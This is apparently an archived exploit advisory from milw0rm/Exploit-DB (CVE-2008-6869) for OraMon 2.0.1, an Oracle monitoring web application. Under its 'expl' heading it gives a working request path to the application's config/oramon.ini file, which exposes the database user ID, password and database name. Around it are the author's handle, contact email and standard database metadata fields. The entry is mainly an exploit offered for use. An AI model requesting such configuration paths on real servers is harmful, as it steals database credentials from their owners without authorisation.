[] NeoSense

OraMon 2.0.1 - Remote Configuration File Disclosure

Author: ahmadbady
type: webapps
platform: php
port: 
date_added: 2008-11-28 
date_updated:  
verified: 1 
codes: OSVDB-56419;CVE-2008-6869 
tags: 
aliases:  
screenshot_url:  
application_url: 

........................

..............................................
+++++Bypass Config Download Vulnerability+++++
...............................................

script:Oramon = Oracle Database Monitoring

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
download:http://www.oramon.org/downloads/oramon.tar.gz

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
expl:

$USERID=
$PASSWORD=
$DATABASE=

www.site.com/path/config/oramon.ini


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  | | | | | |
Author: ahmadbady
  | | | | | |
my mail: kivi_hacker666@yahoo.com | | | | | |
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-11-29]